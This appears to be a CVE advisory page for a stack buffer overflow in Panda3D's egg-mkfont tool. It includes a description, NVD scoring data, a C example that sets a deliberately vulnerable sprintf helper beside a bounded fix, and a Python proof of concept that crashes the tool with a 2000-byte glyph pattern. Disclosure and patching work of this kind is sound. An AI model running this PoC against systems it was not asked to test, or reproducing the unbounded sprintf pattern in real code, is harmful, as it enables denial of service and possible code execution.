Security Vulnerability Report
CVE-2026-22189 CVSS 9.8 CRITICAL

CVE-2026-22189

Published: 2026-01-07 21:16:03
Last Modified: 2026-01-12 17:59:18

Description

The egg-mkfont tool in Panda3D versions up to and including 1.10.16 contains a stack-based buffer overflow caused by an unbounded sprintf() call on attacker-controlled input. When constructing glyph filenames, egg-mkfont formats a user-supplied glyph pattern (-gp) into a fixed-size stack buffer without length validation. An excessively long glyph pattern string can overflow the stack buffer, resulting in memory corruption and a deterministic crash. Depending on build configuration and execution environment, the overflow may also be exploitable for arbitrary code execution.
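
The bug class described above, shown as an added example that is not Panda3D's source code: a hypothetical glyph-filename helper written first with an unbounded sprintf() and then with snprintf() plus a truncation check. The function names, the 256-byte buffer size and the single `%d` placeholder in the pattern are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define GLYPH_NAME_MAX 256  /* assumed size; the real buffer size is not given on the page */

/* Vulnerable shape (hypothetical): output length depends entirely on `pattern`. */
void glyph_name_unbounded(char *out, const char *pattern, int index) {
    sprintf(out, pattern, index);   /* no bound: a long pattern writes past `out` */
}

/* Accept only patterns with exactly one "%d" and no other '%' conversion,
 * so the caller-supplied string cannot act as an arbitrary format string. */
static int pattern_is_safe(const char *pattern) {
    int conversions = 0;
    for (const char *p = pattern; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }   /* literal percent sign */
        if (p[1] != 'd') return 0;            /* reject %s, %n, widths, lone '%' */
        conversions++;
        p++;
    }
    return conversions == 1;
}

/* Hardened form: returns 0 on success, -1 if the pattern is rejected or
 * the formatted name would not fit in `cap` bytes (including the NUL). */
int glyph_name_bounded(char *out, size_t cap, const char *pattern, int index) {
    if (out == NULL || cap == 0 || pattern == NULL || !pattern_is_safe(pattern))
        return -1;
    int n = snprintf(out, cap, pattern, index);
    if (n < 0 || (size_t)n >= cap) {   /* truncated: treat as an error, not a name */
        out[0] = '\0';
        return -1;
    }
    return 0;
}

int main(void) {
    char name[GLYPH_NAME_MAX];
    char long_pattern[2000 + 3];       /* constructed oversized input */
    memset(long_pattern, 'A', 2000);
    strcpy(long_pattern + 2000, "%d");
    printf("%d\n", glyph_name_bounded(name, sizeof name, "glyph%d.png", 7));
    printf("%d\n", glyph_name_bounded(name, sizeof name, long_pattern, 7));
    return 0;
}
```

Treating truncation as a hard error matters here: a silently shortened filename would avoid the overflow but could still make the tool write to an unintended path.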

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:cmu:panda3d:*:*:*:*:*:*:*:* - VULNERABLE
Panda3D < 1.10.17

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2026-22189 PoC - Panda3D egg-mkfont Stack Buffer Overflow
Note: This PoC is for educational and security research purposes only.
"""
import subprocess
import sys
import os


def generate_payload(length=2000):
    """Generate overflow payload - excessive glyph pattern string"""
    # Generate long string to overflow the stack buffer
    return "A" * length


def check_poc():
    """Check if vulnerable version of egg-mkfont exists"""
    # Common paths for egg-mkfont tool
    paths = [
        "/usr/bin/egg-mkfont",
        "/usr/local/bin/egg-mkfont",
        "./egg-mkfont",
        "/opt/panda3d/bin/egg-mkfont"
    ]
    for path in paths:
        if os.path.exists(path):
            return path
    return None


def main():
    print("[*] CVE-2026-22189 PoC - Panda3D egg-mkfont Stack Buffer Overflow")
    print("[*] CVSS Score: 9.8 (CRITICAL)")
    print()

    egg_mkfont_path = check_poc()
    if not egg_mkfont_path:
        print("[-] egg-mkfont tool not found. Please install Panda3D to test.")
        print("    Download: https://www.panda3d.org/")
        return

    print(f"[+] Found egg-mkfont at: {egg_mkfont_path}")
    print("[*] Generating payload with 2000 bytes...")
    payload = generate_payload(2000)

    # Construct the command to trigger overflow
    cmd = [egg_mkfont_path, "-gp", payload, "dummy_font.ttf"]
    print(f"[*] Executing: {' '.join(cmd)}")
    print("[*] This should cause a segmentation fault or crash...")
    print()

    try:
        # Execute and capture result
        result = subprocess.run(cmd, capture_output=True, timeout=5)
        print(f"[+] Exit code: {result.returncode}")
        print(f"[+] Stdout: {result.stdout.decode('utf-8', errors='ignore')}")
        if result.stderr:
            print(f"[+] Stderr: {result.stderr.decode('utf-8', errors='ignore')}")
    except subprocess.TimeoutExpired:
        print("[-] Process timed out")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    main()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22189", "sourceIdentifier": "[email protected]", "published": "2026-01-07T21:16:03.067", "lastModified": "2026-01-12T17:59:18.370", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Panda3D versions up to and including 1.10.16 egg-mkfont contains a stack-based buffer overflow vulnerability due to use of an unbounded sprintf() call with attacker-controlled input. When constructing glyph filenames, egg-mkfont formats a user-supplied glyph pattern (-gp) into a fixed-size stack buffer without length validation. Supplying an excessively long glyph pattern string can overflow the stack buffer, resulting in memory corruption and a deterministic crash. Depending on build configuration and execution environment, the overflow may also be exploitable for arbitrary code execution."}, {"lang": "es", "value": "Las versiones de Panda3D hasta la 1.10.16 inclusive, egg-mkfont contiene una vulnerabilidad de desbordamiento de búfer basado en pila debido al uso de una llamada sprintf() sin límites con entrada controlada por el atacante. Al construir nombres de archivo de glifos, egg-mkfont formatea un patrón de glifo proporcionado por el usuario (-gp) en un búfer de pila de tamaño fijo sin validación de longitud. Suministrar una cadena de patrón de glifo excesivamente larga puede desbordar el búfer de pila, lo que resulta en corrupción de memoria y un fallo determinista. 
Dependiendo de la configuración de compilación y el entorno de ejecución, el desbordamiento también puede ser explotable para ejecución de código arbitrario."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", 
"privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cmu:panda3d:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.10.16", "matchCriteriaId": "EBD14B18-5255-4C59-93D4-597FB077C187"}]}]}], "references": [{"url": "https://github.com/panda3d/panda3d", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://seclists.org/fulldisclosure/2026/Jan/10", "source": "[email protected]", "tags": ["Exploit", "Mailing List", "Third Party Advisory"]}, {"url": "https://www.panda3d.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/panda3d-egg-mkfont-stack-buffer-overflow", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}